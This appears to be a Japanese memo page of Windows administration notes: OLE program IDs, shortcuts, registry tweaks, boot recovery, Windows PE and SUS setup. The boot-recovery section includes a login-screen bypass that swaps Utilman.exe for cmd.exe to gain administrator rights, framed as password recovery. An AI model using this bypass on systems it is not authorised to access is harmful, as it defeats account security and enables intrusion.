OLEプログラムID ActiveXコントロールのOLEプログラムID CheckBox Forms.CheckBox.1 ComboBox Forms.ComboBox.1 CommandButton Forms.CommandButton.1 Frame Forms.Frame.1 Image Forms.Image.1 Label Forms.Label.1 ListBox Forms.ListBox.1 MultiPage Forms.MultiPage.1 OptionButton Forms.OptionButton.1 ScrollBar Forms.ScrollBar.1 SpinButton Forms.SpinButton.1 TabStrip Forms.TabStrip.1 TextBox Forms.TextBox.1 ToggleButton Forms.ToggleButton.1 AccessのOLEプログラムID Application Access.Application、Access.Application.9 CurrentData Access.CodeData、Access.CurrentData CurrentProject Access.CodeProject、Access.CurrentProject DefaultWebOptions Access.DefaultWebOptions ExcelのOLEプログラムID Application Excel.Application、Excel.Application.9 Workbook Excel.AddIn Workbook Excel.Chart、Excel.Chart.8 (グラフ用とそのデータ用の2枚のワークシートが含まれるワークブックを取得。グラフのワークシートがアクティブなワークシートに) Workbook Excel.Sheet、Excel.Sheet.8 (1枚のワークシートが含まれるブックを取得) Microsoft GraphのOLEプログラムID Application MSGraph.Application、MSGraph.Application.8 Chart MSGraph.Chart、MSGraph.Chart.8 Office WebコンポーネントのOLEプログラムID ChartSpace OWC.Chart、OWC.Chart.9 DataSourceControl OWC.DataSourceControl、OWC.DataSourceControl.9 ExpandControl OWC.ExpandControl、OWC.ExpandControl.9 PivotTable OWC.PivotTable、OWC.PivotTable.9 RecordNavigationControl OWC.RecordNavigationControl、OWC.RecordNavigationControl.9 Spreadsheet OWC.Spreadsheet、OWC.Spreadsheet.9 OutlookのOLEプログラムID Application Outlook.Application、Outlook.Application.9 PowerPointのOLEプログラムID Application PowerPoint.Application、PowerPoint.Application.9 WordのOLEプログラムID Application Word.Application、Word.Application.9 Document Word.Document、Word.Document.9、Word.Template.8 Global Word.Global OLE プログラム ID http://www.microsoft.com/japan/msdn/library/default.asp?url=/japan/msdn/library/ja/vbagr10/html/grmscprogrammaticidentifiers.asp サーバー側のグラフ作成機能を使用してグラフを動的に生成する方法 http://support.microsoft.com/kb/244049 2007 Office system ドライバ: データ接続コンポーネント http://www.microsoft.com/downloads/details.aspx?FamilyID=7554f536-8c28-4598-9b72-ef94e038c891&DisplayLang=ja 3D円グラフを使うのはやめよう http://oku.edu.mie-u.ac.jp/~okumura/blog/node/2266
Windows全般的に使用されるホットキー タスクの強制終了 CTRL + Alt + DEL アクティブなタスクの終了 SHIFT + F4 タスクバーの切り替え(右向き) Windowsキー + Tab タスクバーの切り替え(左向き) Winキー + Shift + Tab ポップアップウインドを閉じる ESC タスク(ジョブ)の切り替え Alt + TAB アクティブ画面の直前のウインドに順次切り替え Alt + ESC 次のコントロールメニューに移動 TAB 前のコントロールメニューに戻る SHIFT + TAB スタートボタンの表示 CTRL + ESC ヘルプメニューの表示 F1 ファイルメニューの表示(右クリック and ファイルキー)と等価 SHIFT + F10 ファイルメニューの選択 F10 メニュー項目の選択 カット(切り取り) CTRL + X コピー(クリップボードに) CTRL + C ペースト(貼り付け) CTRL + V アンドゥ(元に戻す) CTRL + Z デスクトップををクリップボードにコピー PrintScreen(COPY)キー アクイィブなウィンドをクリップボードにコピー Alt + PrintScreen                        SHIFT(orCTRL) + COPY エクスプローラを起動する Windowsキー + E 全ウインドの最小化 Windwsキー + M 選択位置を行の一番左に寄せる HomeCLR 選択位置を行の一番右に寄せる END(HELP) ファイルの検索 Windowsキー + F ファイルや文字の検索 F3 ファイル等の操作に関するホットキー ファイル全てを選択 CTRL + A ファイル連続範囲選択 SHFTキー + クリック ファイル複数選択 CTRL + クリック 行、列一括選択 SHIFT + (PageDoun or PageUP or HomeCLR or END) 削除 DEL ごみ箱に入れずに直ちに削除 SHIFT + DEL ファイル名の変更 F2 最新の状態に更新 F5 小窓(フレーム)の切り替え Ctrl + Tab プロパティを表示 Alt + Enter(Altを押しながらダブルクリック) 一つ上の階層(フォルダ)に戻る BS エクスプローラで開く SHIFT + Enter(クリック) 『 フォルダを開くたびに新しいウインドを作る』設定の状態で 同じウインドにファイルを開く CTRL + Enter(クリック) 『別のフォルダを開く時に新しいウインドを作らない』設定の状態で 新しいウインドでファイルを開く CTRL + Enter(ダブルクリック) 詳細表示の状態にて一気に列を揃える Ctrl + 『+』 Windowsキーを使用した操作 スタートメニュー WinKEY タスクバーのアイテム右移動 WinKEY + Tab タスクバーのアイテム左移動 WinKEY + Shift + Tab ウインドウズヘルプ WinKEY + F1 システムのプロパティ WinKEY + Pause エクスプローラ WinKEY + E スタート釦のファイル名を指定して実行(R) WinKEY + R デスクトップの表示(Web統合しているIE4以上でのみ有効) WinKEY + D ファイル検索 WinKEY + F デスクトップ上の全ウィンドウを最小化 WinKEY + M 上記の操作をしたウィンドを元に戻す WinKEY + SHIFT + M Aeroスナップ 最大化 WinKEY + ↑ 垂直方向に最大化 WinKEY + Shift + ↑ 左半分 WinKEY + ← 右半分 WinKEY + → Windows XP で使用可能なショートカット キー一覧 キーボードショートカットキーの一覧 Windows のキーボード ショートカット ショートカット キー
あるサーバだけを [ネットワークコンピュータ] の中に表示させないためには・・・ サーバアナウンスメントをさせない設定が必要。 net config server /hidden:yes コマンドコンソールから、上記コマンドを入力。 この後,net config コマンドで "隠しサーバー" が "Yes" になっていることを確認してリブートする。 このコマンドにより,以下のレジストリが設定される。 値の名前 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 値の型  Hidden(REG_DWORD) 値    1: 隠す      0: 隠さない (デフォルト) ※このコマンド操作を行うと、サーバーサービス のプロパティからの変更処理が効かなくなる MSKB Article ID Q128167 "Server Service Configuration and Tuning" が確認されているので、レジストリを直接操作した方が安全。
ある共有ディレクトリだけを [ネットワークコンピュータ] の中に表示されないようにするには・・・ 単純に共有名の末尾に "$" を付けることで可能。 この様な "隠し共有" は,サーバ上での net share コマンドで簡単に確認可能 クライアント コンピュータで隠し共有または管理用共有を作成および削除する方法 特殊な共有リソース
タスクマネージャの起動を抑制   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 値の名前 DisableTaskMgr 値の型  DWORD 値    1 初期値は 0   ※設定後にログオンしなおす。
コマンドプロンプトのファイル名の補完機能を利用する   ファイル名補完機能(コマンドプロンプト)   HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor   値の名前 : CompletionChar   値の型 : REG_DWORD   値 : 9 フォルダ名補完   値の名前 : PathCompletionChar   値の型 : REG_DWORD   値 : 9   コマンドプロンプトでファイル名補完。   progra[TAB]とかってすると、program filesと自動的に入力されます。(もちろんprogram filesというフォルダがあった場合のみ) 2000 のデフォルトは 0、XP,2003 は最初から 9   値に対応するキーは以下の通り。    0x01:[Ctrl]+[A]    0x02:[Ctrl]+[B]    0x04:[Ctrl]+[D]    0x05:[Ctrl]+[E] 0x06:[Ctrl]+[F] 0x07:[Ctrl]+[G] 0x08:[Ctrl]+[H] 0x09:[Ctrl]+[I] 0x09:[Tab] 0x0B:[Ctrl]+[K] 0x0C:[Ctrl]+[L] 0x0E:[Ctrl]+[N] 0x0F:[Ctrl]+[Q] 0x10:[Ctrl]+[P] 0x11:[Ctrl]+[Q] 0x12:[Ctrl]+[R] 0x14:[Ctrl]+[T] 0x15:[Ctrl]+[U] 0x16:[Ctrl]+[Y] 0x17:[Ctrl]+[W] 0x18:[Ctrl]+[X] 0x19:[Ctrl]+[Y] 0x1A:[Ctrl]+[Z] 0x1B:[Ctrl]+[[] 0x1C:[Ctrl]+[\] 0x1D:[Ctrl]+[]] 0x1E:[Ctrl]+[A] 0x1F:[Ctrl]+[A] 表示色   値の名前 : DefaultColor   値の型 : REG_DWORD   値 : 0 自動実行コマンド   値の名前 : AutoRun   値の型 : REG_MULTI_SZ   値 : コマンド文字列(デフォルトは値なし)        例)d: & dir & cls & (echo %TIME%) & (echo %DATE%) & (echo %USERNAME%)         複数行は & で繋ぐ。コマンドにオプションが含まれる場合は()で括る。
Windows NT/2000/XP のパフォーマンスを向上させたい場合のチューニング手法 メモリーパラメータの最適化 システムのメモリ管理パラメータをチューニングすることで、メモリを有効利用できる可能性があります。 [スタート]−[ファイル名を指定して実行] から regedit を起動します。   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management   値の名前 : LargeSystemCache   データ型 : REG_DWORD   値 : 0 Small モデル。アプリケーション起動用に 4MB 確保。稼働中のアプリケーションは遅くなる。(Professional のデフォルト)         1 Large モデル。アプリケーション起動用にメモリーを確保しない。         ※アプリケーション起動用メモリの確保。十分なメモリがある場合は、Large モデルに変更する。   値の名前 : DisablePagingExecutive   データ型 : REG_DWORD   値 : 0 カーネルの一部を仮想メモリにスワップアウトする。 (512MB以下         1 カーネルは常にメインメモリに置く (512MB以上          ※Windows 2000 があらかじめ確保しているメモリーの予約領域を拡大することで、処理速度の低下を回避           ただし、コンピュータが512MB以上のメモリーを搭載している場合に限る。           512MBよりも少ない場合に設定を変えるとハングアップするなどコンピュータを正常に利用できないこともあるので注意するように。   値の名前 : IoPageLockLimit   値の型 : REG_DWORD   値     : 0(デフォルト)         搭載メモリ量  設定サイズ[10進数]         32MB      4096         64MB      8192         128MB      16384         256MB以上    65536         ※ファイルシステム用のキャッシュサイズを最適化。搭載メモリ量に応じてファイルキャッシュを増やすことでパフォーマンスを改善可能。   値の名前 : SecondLevelDataCache   値の型 : REG_DWORD   値 : 0(デフォルトの 0 では 256KB を示す)        ※L2 キャッシュサイズを正しく設定。         PentiumII や PentiumIII(Katmai)、Athlon を使っている場合は 10 進数で 512 に変更。P4もかな?         変更する前に CPU-Z 等のツールで確認しましょう。 スプールフォルダの場所を変える   [スタート][設定][プリンタ]→[ファイル][サーバーのプロパティ]→[詳細設定] タブをクリックし、スプールフォルダを変更します。 ページファイルの場所を変える   「マイコンピュータ」を右クリックし、[プロパティ] をクリック   [詳細]→「パフォーマンスオプション」→仮想メモリの「変更」ボタンをクリック   ※ページファイルの場所をアクセス競合の少ないと思われるドライブに変更 NTFS ドライブのパフォーマンス向上   ファイルやフォルダの最終アクセス時刻の記録や、8.3 形式の名前生成を停止することで、NTFS ドライブのパフォーマンスを向上させる。   ※登録されていない場合は新規で作る必要がある。   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem   値の名前 : NtfsDisableLastAccessUpdate   値の型 : REG_DWORD   値 :1(登録しない)   値の名前 : NtfsDisable8dot3NameCreation   値の型 : REG_DWORD   値 : 1(利用しない) Windows XP, Windows 2003 で MS05-011 適応後にサブフォルダが見えなくなる場合があるようです。 http://support.microsoft.com/kb/896427/ja 64 ビット版の Windows Server 2003 または Windows XP の適切なページング ファイル サイズを決定する方法 http://support.microsoft.com/kb/889654/ja Cドライブの残りが少なくて印刷出来ないって話を、聞いたので追加 印刷スプーラを別のハード ディスクに移動  コントロール パネル→[プリンタと FAX]   [ファイル]→[サーバーのプロパティ]→[詳細設定]→[スプール フォルダ]  プリンタごとに既定のスプール ディレクトリを移動   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\特定のプリンタ   値の名前 : SpoolDirectory   値の型 : REG_SZ   値 : プリンタのスプール ディレクトリへのフル パス    137503 デフォルトの Windows NT スプール ディレクトリとアクセス権    http://support.microsoft.com/kb/137503/JA/ 既定の Windows ページング ファイルと印刷スプーラを別のハード ディスクに移動する方法 http://support.microsoft.com/kb/314105/ja Documents and SettingsをDドライブに移動する http://www.center-left.com/backup/move_data_folder.html ちなみに、Windows Server 2003 までは Windows の仕様制限で 印刷の管理 で管理出来るプリンターの最大接続数は 10 までとなっています。 10台以上ある場合は、 Windows Server 2008 が必要。  クライアントWindowsのファイル共有は最大10ユーザーまで  http://www.atmarkit.co.jp/fwin2k/win2ktips/1349maxusr/maxusr.html デスクトップの整理。  大量にデスクトップにファイルが散らばっている場合、アイコン表示などで重くなります。  フォルダを作ってその中に全部移動しちゃうといいかも。 メモリの買い足し。  メインメモリが 512MB の場合は、2GB 程度に増強しましょう。(これが一番効果があります) HDD を SSD に換装する。  思い切って SSD に乗せ変えた後に、クリーンインストールして再構築。  HDD が肥大化して大量に断片化している場合は効果絶大でしょう。(ランダムアクセスは4倍程度変ります) ファイルをCから「移す」 http://pc.nikkeibp.co.jp/article/knowhow/20101101/1028259/
Windows 2000の機能を利用し、パスワードを自動生成する   「net user」コマンドの隠しオプションに「/random」があるので   これを使用し、パスワードの変更とパスワードの自動生成を同時に行う。   構文   ローカルユーザ     net user ユーザー名 /random   ドメインユーザーの場合     net user ユーザー名 /domain /random   変更はAdministratorでログインしておく必要が有る。   変更例    ローカルユーザー「gestuser」のパスワードの生成と設定を行う。        net user gestuser /random      実行結果は      gestuserのパスワード: Q4qXdWr_   次回のログインからこのパスワードが有効になるので、パスワードのメモを取っておく。   ※パスワードの管理は厳重に!   記事がありました。    Administratorのパスワードを簡単に設定する    http://arena.nikkeibp.co.jp/tec/winxp/20040913/109432/   ついでに    認術大会    http://www.securityfriday.com/jp/contents/ninjutsutaikai.htm    新連載:ツールを使ってネットワーク管理(5)    俺の「パスワード:*****」って何でしたっけ? 〜アプリケーションのパスワード調査編〜    http://www.atmarkit.co.jp/fnetwork/rensai/netool05/asterisklogger01.html    パスワードの重要性を再認識せよ〜“破り方”を知り,対策に役立てる〜    http://itpro.nikkeibp.co.jp/article/COLUMN/20060513/237782/    パスワードの運用(利用者編)    http://itpro.nikkeibp.co.jp/article/COLUMN/20060330/233897/    パスワードの運用(管理者編)    http://itpro.nikkeibp.co.jp/article/COLUMN/20060406/234748/    正しいパスワード ポリシーを選択する    http://www.microsoft.com/japan/technet/community/columns/5min/5min-302.mspx    強力なパスワード : その作り方と使い方    http://www.microsoft.com/japan/athome/security/privacy/password.mspx
システムが何らかの原因によって破損し、デスクトップが表示されない時のWindowsの復活方法 ・DOS等で起動する ・c:\windows\systemのsystem.iniを開き  [boot] セクションの shell=Explorer.exe と書かれた行を、  shell=Progman.exe に書き換える。 ※バックアップはきちんと取りましょう。  デスクトップでマウスの右クリックから「最新の情報に更新」や「セーフモードによる起動」も試してみましょう。。。  ログオン以降で問題が発生している場合   問題が発生していない別のアカウントでログオン出来る場合は、障害が発生したユーザのプロファイルが原因の可能性が高い。   この場合は、Administrator(管理者権限)でログインして、システムのプロパティの詳細設定から問題が発生したユーザの   プロファイルを削除。(プロファイルが再構成されログオンできる可能性がある) 関連 ファイルが失われているか壊れていてWindows XPを起動できない場合の回復コンソールでの修復方法 Windows XP のログオン画面が表示されず、コンピュータが再起動し続ける ハード ディスクを NTFS ファイル システムに変換後 Windows XP を再起動したときのエラー メッセージ "次のファイルが存在しないかまたは壊れているため、Windows を起動できませんでした: System32\Drivers\Ntfs.sys" Windows Millennium Edition でクリーン ブートを実行する方法 Windows 98 でクリーン ブート トラブルシューティングを実行する方法 [HOWTO] Windows XP で高度なクリーン ブート トラブルシューティングを実行する Windows 2000 でクリーンブート トラブルシューティングを実行する方法 レジストリの破損により Windows XP を起動できなくなった場合の回復方法 特定の STOP メッセージのトラブルシューティング Windows 2000/XP/2003 のシステム・ファイルを誤って削除してしまった場合は sfc.exe(システム・ファイル・チェッカー)を利用すると簡単に修復できます。 サポートツールの中にある、Depends.exe(Dependency Walker)を使うと起動に失敗するサービスやドライバで 不足しているコンポーネントや、古いコンポーネント、破損しているコンポーネントを調査できます。
なんらかの原因で、HDD からブート出来なくなった場合に FD からのブートさせる方法 ※ Ntldr がなんらかの原因で破損し、読み取れない場合 ( NTLDR is missing と表示される時 ) ブートディスクの作成方法 1.フロッピーディスクを FAT でフォーマット   ※ Win98/Me ではダメです。 2.その PC のシステムドライブから 下記ファイルをコピー   ・Ntldr   ・boot.ini   ・Ntdetect.com   ※コンピュータが既に起動出来ない場合は、別マシンからコピーでも OK   また、インストール用 CD の i386 フォルダにある   ・Ntldr   ・Ntdetect.com でもコピー可能です。 3.コピーした Boot.ini をメモ帳で開く。   記述されているシステムフォルダのパスが、「multi(x)」から始まる場合   (IDE の場合)は、これで起動用フロッピーの完成です。   「scsi(x)」から始まる場合は、SCSI コントローラのドライバーが必要に   なります。この場合は、デバイスマネージャから、ドライバーを特定して   FD にコピーして下さい。   ※コピーしたら、ファイル名を「Ntbootdd.sys」に変更する事。 ※ Windows 2000/2003 以外での確認はしていません。 コンピュータの起動時にエラー メッセージ "次のファイルが存在しないかまたは壊れているため、Windows を起動できませんでした" が表示される フロッピー・ディスクからWindows OSを起動する とりあえず、インストールCD から 修復セットアップで C:\>chkdsk /r してみると、直るかも。 boot.ini NTDETECT.COM ntldr bootfont.bin をコピーする場合は、OS の CD から 回復コンソールを起動し C:\>copy D:\i386\ntldr ATTRIB -C C:\NTLDR exit で CD からコピーして圧縮属性を外して再起動。 ・NTDR is missing ・Missing Operating System ・Operating System Not Found ・Invalid system disk が表示されている場合は、回復コンソールからブートセレクタとMBR を修復してみる。 ブートセレクタの修復コマンドは、「fixboot」 MBR の修復コマンドは、「fixmbr」Windows Vistaの場合は bootrec /FixMbr, Windows 98/Me は fdisk /mbr ●セーフモードで起動出来た場合  「システム構成ユーティリティ(Msconfig.exe)」を使用し  スタートアップオプションで起動するサービスやスタートアップ項目を選択、通常起動を試す。  ※セーフモードで実行中のサービスを無効にしないように ●セーフモードで起動出来ない場合  「ブートログ作成を有効にする」を利用してログを確認  「%Systemroot%\Ntbtlog.txt」に書き込まれるログを回復コンソールや WindowsPE2.0 環境から  確認して、どこで起動がストップしているかを判断 ●起動が失敗しているサービスやドライバ、プログラムが判明したら  サポートツールの「Dependency Walker(Depends.exe)」で検査   Dependency Walker は、ファイルが見付からない、破損している、古くなっている等の理由で   アプリケーションやサービス、コンポーネントが起動しない状況を検査できるツール ●まったく起動できないシステムの場合  回復コンソール を利用し「LISTSVC」コマンドを実行   このコマンドは、回復コンソールでログオンした Windows に登録されている   サービスやシステムのスタートアップ一覧が確認出来る。  問題となっているサービスやドライバ名を確認したら「DISABLE」コマンドを利用   DISABLE コマンドは、そのサービスやドライバを無効に設定する。   逆に有効にするには、「ENABLE」コマンドを使う。 ●破損したファイルを CD(圧縮ファイル)を使って上書き  例)オリジナルの圧縮ファイル「D:\I386\WIN32K.SY_」 EXPAND D:\I386\WIN32K.SY_ C:\WINDOWS\SYSTEM32 ●更新プログラムが原因の場合の回復コンソールを使ったアンインストール  更新プログラムの KB 番号を調べる  回復コンソールにログインして「BATCH」コマンドを利用してアンインストール   例)「KB926247(MS06-074)」の場合     「$NtUninstallKB926247$」この下に「SPUNINST」フォルダがあり      SPUNINST.TXT と言うファイルがある。      このファイルには、回復コンソール内で更新プログラムをアンインストール      する為のコマンドラインが記述されている。     CD $NtUninstallKB926247$\SPUNINST     BATCH SPUNINST.TXT ●レジストリが原因の場合   レジストリの破損により Windows XP を起動できなくなった場合の回復方法   http://support.microsoft.com/kb/307545/ja ついでにメモリもチェック  Windows メモリ診断  http://oca.microsoft.com/ja/windiag.asp ログオフに長い時間がかかったり、プロファイルの整合性が取られないなどの問題を解決するツール  User Profile Hive Cleanup Service  http://www.microsoft.com/downloads/details.aspx?FamilyID=1b286e6d-8912-4e18-b570-42470e2f3582&DisplayLang=ja VISTA でログオンパスワードを忘れた場合 Vistaは誰でも管理者権限で操作可能、新たなセキュリティーホールが見つかる http://www.technobahn.com/news/2008/200805261637.html  CDブートして、Utilman.exeをcmd.exeに置き換えてリブート  ログイン画面で「U」を押して「Utilman.exe」のコンソール画面を起動  コンソール画面から「explorer」を起動で管理者権限で全て操作可能と。  2008 Server もいけるかもしれませんね。 ファイルを1つコピーするだけでWindowsXPの再アクティベートを回避する術 http://www.lifehacker.jp/2008/09/1windowsxp.html Windows XPのアクティベーション情報をバックアップする http://www.atmarkit.co.jp/fwin2k/win2ktips/1148backupwpa/backupwpa.html  System32 の WPA.DBL をバックアップしておいてから、再セットアップ後の上書きで OK のようです。 ログイン出来ている間に用意しておきましょう。  Microsoft Windows Vista でのディスクのリセット、パスワードを作成します。  http://support.microsoft.com/kb/959061  Windows Vista でパスワード リセット ディスクを作成して使用する方法  http://support.microsoft.com/kb/930381 起動しなくなったシステムからデータをサルベージするには? http://www.computerworld.jp/topics/mws/165609-1.html オフラインの状態でレジストリを編集するには? http://www.computerworld.jp/topics/mws/165609-3.html Windows 7 と Windows サーバー 2008 R2 のインストールをトラブルシューティングする方法 http://support.microsoft.com/kb/2671783 忘れたAdministratorパスワードを変更する方法 | Always on the clock https://sophiakunii.wordpress.com/2011/08/16/%e5%bf%98%e3%82%8c%e3%81%9fadministrator%e3%83%91%e3%82%b9%e3%83%af%e3%83%bc%e3%83%89%e3%82%92%e5%a4%89%e6%9b%b4%e3%81%99%e3%82%8b%e6%96%b9%e6%b3%95/ Windows 7の起動時に管理者権限を強制的に取得する裏技 - GIGAZINE http://gigazine.net/news/20150203-windows7-grab-admin-account/
ブートディスクの作成   このWindows 2000用起動ディスクの用途としては、MBR(Mustor Boot Record)が壊れてしまった場合などの緊急用として      必要ファイル   boot.ini   bootfont.bin   ntdetect.com   ntldr   bootsect.dos このファイルはデュアルブートしている環境時に必要      Windows2000がインストールされている事が前提となる。   ※ MBR の修復は、回復コンソールから 「FIXMBR」を実行することで修復出来ます。 [HOWTO] Windows Server 2003 ファミリで NTFS または FAT パーティション用のブート ディスクを作成する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;325879 Windows PE を用意しておくと楽かも。  作成手順  1.BDD2007 をインストール     Microsoft Solution Accelerator for Business Desktop Deployment 2007     http://www.microsoft.com/japan/technet/desktopdeployment/bdd/2007/default.mspx  2.スタート>プログラム>BDD 2007>Deployment Workbench を起動  3.Deployment Workbench>Information Center>Components へアクセスして必要なコンポーネントをダウンロード、インストール    (Windows Automated Installation Kit を選択してインストールすること)  4.Deployment Workbench>Deploy>Deployment Points>New を選択  5.中央に出てくる「LAB」を選択し、Update をクリック(Windows PE の ISO イメージが LiteTouchPE_x86.iso という名で作成される)    Windows PE 2.0 による USB メモリからの Bootは   Windows 自動インストール キット (AIK)   http://www.microsoft.com/downloads/details.aspx?familyid=C7D4BC6D-15F3-4284-9123-679830D629F2&displaylang=ja  1.管理者として Windwos PE Tools コマンド プロンプトを起動し、作業用フォルダを作成    C:\Program Files\Windows AIK\Tools\PETools>CopyPE x86 c:\WinPE (32ビット版)    C:\Program Files\Windows AIK\Tools\PETools>CopyPE amd64 c:\WinPE (64ビット版)  2.コピーされた WindowsPE2.0 を MOUNT フォルダに展開    C:\WinPE>imagex /apply winpe.wim 1 mount    C:\WinPE>peimg /list mount 展開されたコンポーネントの確認  3.WHS と WMI を追加    C:\WinPE>peimg /install=winpe-scripting-package mount\windows    C:\WinPE>peimg /install=winpe-wmi-package mount\windows  4.不要なパッケージ削除し、最適化    C:\WinPE>peimg /prep mount/windows  5.デバイスドライバの追加   C:\WinPE>peimg /inf=ドライバのファイルパス mount\windows よく使うツール等も、mount\windows に入れておく。(RAMDISK に置かなくて良ければ ISO フォルダへ)  6.ISO イメージの作成    C:\WinPE>imagex /capture mount iso\sources\boot.wim "Custom WinPE" /boot /compress max  7.起動可能な ISO イメージに作り変える    C:\WinPE>oscdimg -n -betfsboot.com iso CustomWinPE.iso  8.USB メモリに入れる    USB メモリを FAT32 でフォーマット      C:\WinPE>diskpart diskpart>select disk list disk select disk 1 clean create partition primary size=サイズを設定 select partition 1 active format fs=fat32 assign exit         ISO フォルダの内容をコピーする。 ※PE から起動して、シャットダウンする場合は、wpeutil コマンドを使う。  Windows Server 2003 でのWindows 展開 サービス(WDS)ログインを有効にする方法  http://support.microsoft.com/kb/936625  管理者必携! 最強のデータ・サルベージ・ツールを自作する  http://www.atmarkit.co.jp/fwin2k/operation/winpe2/winpe2_01.html  改訂 管理者必携! 最強のデータ・サルベージ・ツールWindows PE 3.0(前編)  http://www.atmarkit.co.jp/fwin2k/operation/winpe301/winpe301_01.html  改訂 管理者必携! 最強のデータ・サルベージ・ツールWindows PE 3.0(後編)  http://www.atmarkit.co.jp/fwin2k/operation/winpe302/winpe302_01.html  [新]Windows PE 徹底活用バイブル〜基礎編〜  http://www.computerworld.jp/topics/mws/191121.html  [新]Windows PE 徹底活用バイブル〜ブータブルメディア作成編  http://www.computerworld.jp/topics/mws/191181.html  [新]Windows PE 徹底活用バイブル〜トラブル解決活用編  http://www.computerworld.jp/topics/mws/191243.html   Windows Vista 用の更新プログラム (KB942813)   http://www.microsoft.com/downloads/details.aspx?FamilyID=40f4edfd-566c-420d-b9c7-c41e5afcdba0&DisplayLang=ja   Windows Vista for x64-based Systems 用の更新プログラム (KB942813)   http://www.microsoft.com/downloads/details.aspx?FamilyID=583fd9f0-fad1-41d9-84d6-a373dbd638a3&DisplayLang=ja   WinPE 2.0 に非標準の大容量記憶装置用ドライバを追加する方法   http://support.microsoft.com/kb/944348   946084 の修正プログラムがコンピュータにインストールされていても、Windows Vista ベース コンピュータを起動すると、STOP エラー:"0x0000C1F5"   http://support.microsoft.com/kb/958069 最終手段?  使用不能になったハードディスクを復活させる「HDD Regenerator」  http://gigazine.net/index.php?/news/comments/20060811_hdd_regenerator/  データ復旧「データサルベージコーポレーション」による復旧事例の数々をムービーでチェック、ハードディスクが壊れてもあきらめてはいけない  http://gigazine.net/index.php?/news/comments/20080916_data_salvage_hdd_repair_coop/ ハードディスク劣化の原因と対策 http://hddbancho.co.jp/deteriorationandmeasuresof_hdd.html Windowsはどうやって起動しているのか? http://itpro.nikkeibp.co.jp/article/COLUMN/20080929/315572/ オフラインの状態でレジストリを編集するには? http://www.computerworld.jp/topics/mws/165609-3.html レジストリの破損により Windows XP を起動できなくなった場合の回復方法 http://support.microsoft.com/kb/307545 ブート構成データ エディタについてよく寄せられる質問 http://www.microsoft.com/japan/technet/windowsvista/library/85cd5efe-c349-427c-b035-c2719d4af778.mspx?sess=40c48c4fe7f6de36799a3c52966cfd10
Software Update Servicesをセットアップ SUSのサーバへのインストール  1. IIS 5.0をインストール  2. IE 6.0をインストール  3. SP3の適用  4. SP3にセキュリティ修正モジュールを適用  5. SUSサーバモジュールをインストール     ⇒ http://www.microsoft.com/japan/windows2000/windowsupdate/sus/default.asp   「SUSSetup.msi」を右クリックして「インストール」を選択   セットアップの構成は「標準」でOK   この場合、最も容量の多いNTFSフォーマットされたドライブがコンテンツの保存先用ドライブとして選択される。   5.1. ダウンロードURLを控えておく。     「インストールの準備完了」画面の「ダウンロードURLの指定」に表示されるURL     (http://<SUSサーバー名>/)はSUSクライアントでSUSサーバの指定をする時に必要になるので、URLをメモしておく。   5.2. IIS Lockdown Wizardの自動実行     IIS5.0のセキュリティを高める為に自動実行される。      SUSをアンインストールしても、この設定は保存される。      IIS Lockdown Wizardで変更される設定       スプリクトの実行:許可       ASPの有効化       スプリクトマッピングの削除       IDQ,SHTML,STM,IDC,printer,HTRのマッピング無効化      「既定のWebサイト」のファイル削除       /Scripts, /MSDAC仮想ディレクトリの削除      WebDAVの無効化       WebDAVの無効化      IISの匿名ユーザの制限       システムユーティリティの実行:禁止       コンテンツの書き込み:禁止   5.3. 管理用WebサイトのURLを記録しておく。     SUSセットアップウイザードの完了時に表示されるURL(http://<SUSサーバ名>/SUSAdmin/)は      SUSサーバ以外のコンピュータからSUSサーバの設定を行う際に必要になるのでURLをメモしておく。 SUSサーバのオプションを設定  SUSサーバのモジュールのインストールが完了したら、管理ツールから「Software Update Services」を起動  ●プロクシサーバの設定   SUSサーバがWindows Updateサイトとhttpで通信出来るようにします。   直接通信可能であれば、「インターネットへのアクセスにプロクシサーバを使用しない」を選択する。  ●この更新サーバを見つけるためにクライアントが使用する名前を指定してください   SUSクライアントがSUSサーバに接続する際に使用する名前を、NetBIOS名、<サーバ名>.<インターネットドメイン名>   (Fully Qualified Domain Name:FQDN)で指定する。また、IPアドレスを指定する事も可能  ●コンテンツを同期するサーバを選択します   管理対象のSUSサーバがスタンドアロンや親SUSサーバの場合は、「Windows Updateサーバから直接同期する」を選択  ●以前に許可された更新の新しいバージョンを処理する方法を選択してください   既に許可済みの修正モジュールの更新版をWindows Updateサイトから取得した場合に   その修正モジュールを自動的に許可済みにするか、管理者が改めて許可し直すかを設定  ●更新を保管する場所を選択します   適用可能な修正モジュールの制限のみを目的とする場合や、SUSサーバの空き容量が少ない場合は   「Windows Updateサーバで更新を維持する」に選択   SUSサーバにカタログファイルと、パッケージの両方を保存する場合は   「更新をローカルフォルダに保存する」を選択     ⇒デフォルトでは全ての言語が選択されているので必要なもののみに変更しておく      Updateサイトから、Windows2000、XPの全ての言語パッケージをダウンロードすると      膨大なネットワーク帯域とディスク容量が必要となるので注意する事  ●コンテンツの同期を実行する   SUSサーバのオプションを設定して実行の準備が整ったら、「サーバの同期」をクリックして   Windows Updateサイトからコンテンツをダウンロードする。  ●モジュールごとに更新を許可する   同期処理でダウンロードした更新モジュールは、システム管理者が許可するまでSUSクライアントにインストール出来ません。   設定するには、「更新の許可」をクリックしてモジュール名の右に「許可されていません」と表示された更新モジュール   を個別に許可する必要があります。これによって、システム管理者がシステム環境に適合するSPやSRP、修正モジュールを   任意に選択してSUSクライアントに提供出来るようになる。 SUSのクライアントへのインストール  ・Windows 2000 Service Pack 3(単体ではなくSP3に組み込み済み)  ・Windows xp Service Pack 1  ・Webからのダウンロード(Windows 2000/xp)     ⇒ http://www.microsoft.com/japan/windows2000/windowsupdate/sus/default.asp クライアントをSUSに同期させる  ●ポリシーの設定   1. 名前を指定して実行で、「gpedit.msc」を起動   2. 「コンピュータの構成」→「管理用テンプレート」を右クリックして「テンプレートの追加と削除」を選択   3. ダイアログの「追加」ボタンを押して、「wuau.adm」を選択する  ●自動更新を構成する   設定値 2-ダウンロードの前、及びインストールの前に通知し、コンピュータにインストールする前に再度通知する       3-更新を自動的にダウンロードして、インストールの準備が出来たら通知する       4-更新を自動的にダウンロードして、指定したスケジュールでインストールする  